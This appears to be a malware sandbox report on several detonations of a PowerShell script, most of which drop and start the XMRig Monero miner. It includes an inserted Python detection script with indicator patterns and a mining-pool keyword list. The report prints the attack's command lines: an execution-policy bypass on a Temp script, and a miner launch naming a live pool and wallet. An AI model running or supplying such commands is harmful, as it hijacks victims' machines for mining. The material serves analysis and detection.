memory/332-139-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-140-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-141-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-142-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-143-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-144-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-145-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-146-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-147-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-148-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-149-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-150-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-151-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-152-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-153-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-154-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-155-0x00007FF65F950000-0x00007FF660583000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:57
Platform
win11-20240611-en
Max time kernel
1799s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 460 wrote to memory of 868 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 460 wrote to memory of 868 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/460-0-0x00007FFAFF153000-0x00007FFAFF155000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fszm2x45.dmy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/460-10-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/460-9-0x000002751D8B0000-0x000002751D8D2000-memory.dmp
memory/460-11-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/460-12-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/460-14-0x000002751DA60000-0x000002751DA72000-memory.dmp
memory/460-15-0x000002751D900000-0x000002751D90A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/868-46-0x0000028D695E0000-0x0000028D69600000-memory.dmp
memory/868-47-0x0000028D6ADE0000-0x0000028D6AE00000-memory.dmp
memory/868-48-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/460-49-0x00007FFAFF153000-0x00007FFAFF155000-memory.dmp
memory/460-50-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/868-51-0x0000028D6AE00000-0x0000028D6AE20000-memory.dmp
memory/868-52-0x0000028D6AE20000-0x0000028D6AE40000-memory.dmp
memory/460-54-0x00007FFAFF150000-0x00007FFAFFC12000-memory.dmp
memory/868-53-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-55-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-56-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-57-0x0000028D6AE00000-0x0000028D6AE20000-memory.dmp
memory/868-58-0x0000028D6AE20000-0x0000028D6AE40000-memory.dmp
memory/868-59-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-60-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-61-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-62-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-63-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-64-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-65-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-66-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-67-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-68-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-69-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-70-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-71-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-72-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-73-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-74-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-75-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-76-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-77-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-78-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-79-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-80-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-81-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-82-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-83-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-84-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-85-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-86-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-87-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-88-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-89-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-90-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-91-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-92-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-93-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-94-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-95-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-96-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-97-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-98-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-99-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-100-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-101-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-102-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-103-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-104-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-105-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-106-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-107-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-108-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-109-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-110-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-111-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-112-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-113-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-114-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-115-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-116-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
memory/868-117-0x00007FF6E8150000-0x00007FF6E8D83000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:58
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4896 wrote to memory of 4356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4896 wrote to memory of 4356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
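The behavioral6, behavioral16 and behavioral18 runs above all show the same chain: powershell.exe started with -ExecutionPolicy bypass on a .ps1 in the user's Temp directory, a dropped xmrig-6.21.3\xmrig.exe (same SHA256 in every run) launched with a pool endpoint (-o gulf.moneroocean.stream:10128) and a 95-character Monero wallet (-u 45aHvZ...), and a TCP session to 149.102.143.109:10128 after the pool name is resolved. Those are the indicators a detection engineer keys on. The script below is an added example, not part of this report or of the sandbox's own tooling: it runs a handful of rules over the process command lines and Network rows as they appear here. The sample records are copied from the behavioral18 run, while the rule names, the POOL_KEYWORDS list and the helper names are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Constructed sample records, copied from the behavioral18 run of this report
# (behavioral6 and behavioral16 show the same command lines and pool endpoint).
PROCESS_CMDLINES = [
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (14) - copia.ps1"',
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" '
    '-o gulf.moneroocean.stream:10128 '
    '-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF',
]
NETWORK_ROWS = [  # (country, destination, domain, proto), as in the report's Network table
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "gulf.moneroocean.stream", "udp"),
    ("DE", "149.102.143.109:10128", "gulf.moneroocean.stream", "tcp"),
]

# Hand-picked substrings of public Monero pool hostnames (an assumption; extend for your estate).
POOL_KEYWORDS = ("moneroocean", "supportxmr", "hashvault", "nanopool", "xmrpool", "c3pool")

# Monero mainnet primary address: 95 base58 characters starting with "4" (base58 has no 0, O, I, l).
XMR_ADDR = re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")
# XMRig-style pool argument: -o / --url host:port, optionally prefixed with stratum+tcp:// or stratum+ssl://.
POOL_FLAG = re.compile(r"(?:^|\s)(?:-o|--url)[\s=]+(?:stratum\+(?:tcp|ssl)://)?([A-Za-z0-9.-]+):(\d{2,5})")
PS_BYPASS = re.compile(r"-ExecutionPolicy\s+bypass", re.IGNORECASE)
# An .exe run from the user's Temp directory, quoted or not.
TEMP_EXE = re.compile(r'([A-Za-z]:\\Users\\[^"\\]+\\AppData\\Local\\Temp\\[^"]+?\.exe)', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def scan_cmdline(cmd: str) -> list:
    """Apply the command-line rules to one process command line."""
    findings = []
    if PS_BYPASS.search(cmd):
        findings.append(Finding("powershell_execution_policy_bypass", cmd))
    m = TEMP_EXE.search(cmd)
    if m:
        findings.append(Finding("exe_launched_from_user_temp", m.group(1)))
    m = POOL_FLAG.search(cmd)
    if m:
        findings.append(Finding("miner_pool_argument", f"{m.group(1)}:{int(m.group(2))}"))
    for addr in XMR_ADDR.findall(cmd):
        findings.append(Finding("monero_wallet_in_cmdline", addr))
    return findings


def scan_network(rows) -> list:
    """Flag TCP sessions whose resolved domain matches a known pool; DNS lookups alone are not flagged."""
    findings = []
    for country, dest, domain, proto in rows:
        _host, _, port = dest.rpartition(":")
        if proto != "tcp" or not port.isdigit():
            continue
        if any(k in domain.lower() for k in POOL_KEYWORDS):
            findings.append(Finding("stratum_pool_connection", f"{domain} -> {dest} ({country})"))
    return findings


def scan_report(cmdlines, network_rows) -> dict:
    """Merge every finding into rule -> [evidence, ...] so one report yields one summary."""
    merged = {}
    findings = [f for c in cmdlines for f in scan_cmdline(c)] + scan_network(network_rows)
    for f in findings:
        merged.setdefault(f.rule, []).append(f.evidence)
    return merged


if __name__ == "__main__":
    for rule, evidence in scan_report(PROCESS_CMDLINES, NETWORK_ROWS).items():
        print(f"{rule}:")
        for e in evidence:
            print(f"    {e}")
```

Two caveats when turning this into a production rule. The wallet and pool host are the most durable indicators here (they are identical across all three runs, as is the xmrig.exe SHA256 2025f4fe...), whereas the pool IP and port can change without the operator touching the script. The github.com and objects.githubusercontent.com traffic is consistent with the .ps1 fetching the xmrig-6.21.3 release, but the report does not show the requested URL, so do not hard-code one.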
Files
memory/4896-0-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp
memory/4896-5-0x0000013E22F60000-0x0000013E22F82000-memory.dmp
memory/4896-8-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
memory/4896-9-0x0000013E23110000-0x0000013E23186000-memory.dmp
memory/4896-10-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kj1d2zw2.dpx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4896-25-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp
memory/4896-48-0x0000013E23290000-0x0000013E232A2000-memory.dmp
memory/4896-61-0x0000013E23100000-0x0000013E2310A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4356-90-0x0000013D71B50000-0x0000013D71B70000-memory.dmp
memory/4356-91-0x00007FF664A90000-0x00007FF6656C3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:17
Platform
win10v2004-20240611-en
Max time kernel
1797s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4852 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4852 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
memory/4852-0-0x00007FFDBC5E3000-0x00007FFDBC5E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0eootltk.0k2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240508-en
Max time kernel
1678s
Max time network
1687s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2544-0-0x00007FF9D55F3000-0x00007FF9D55F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_smhau4vx.uvb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:48
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
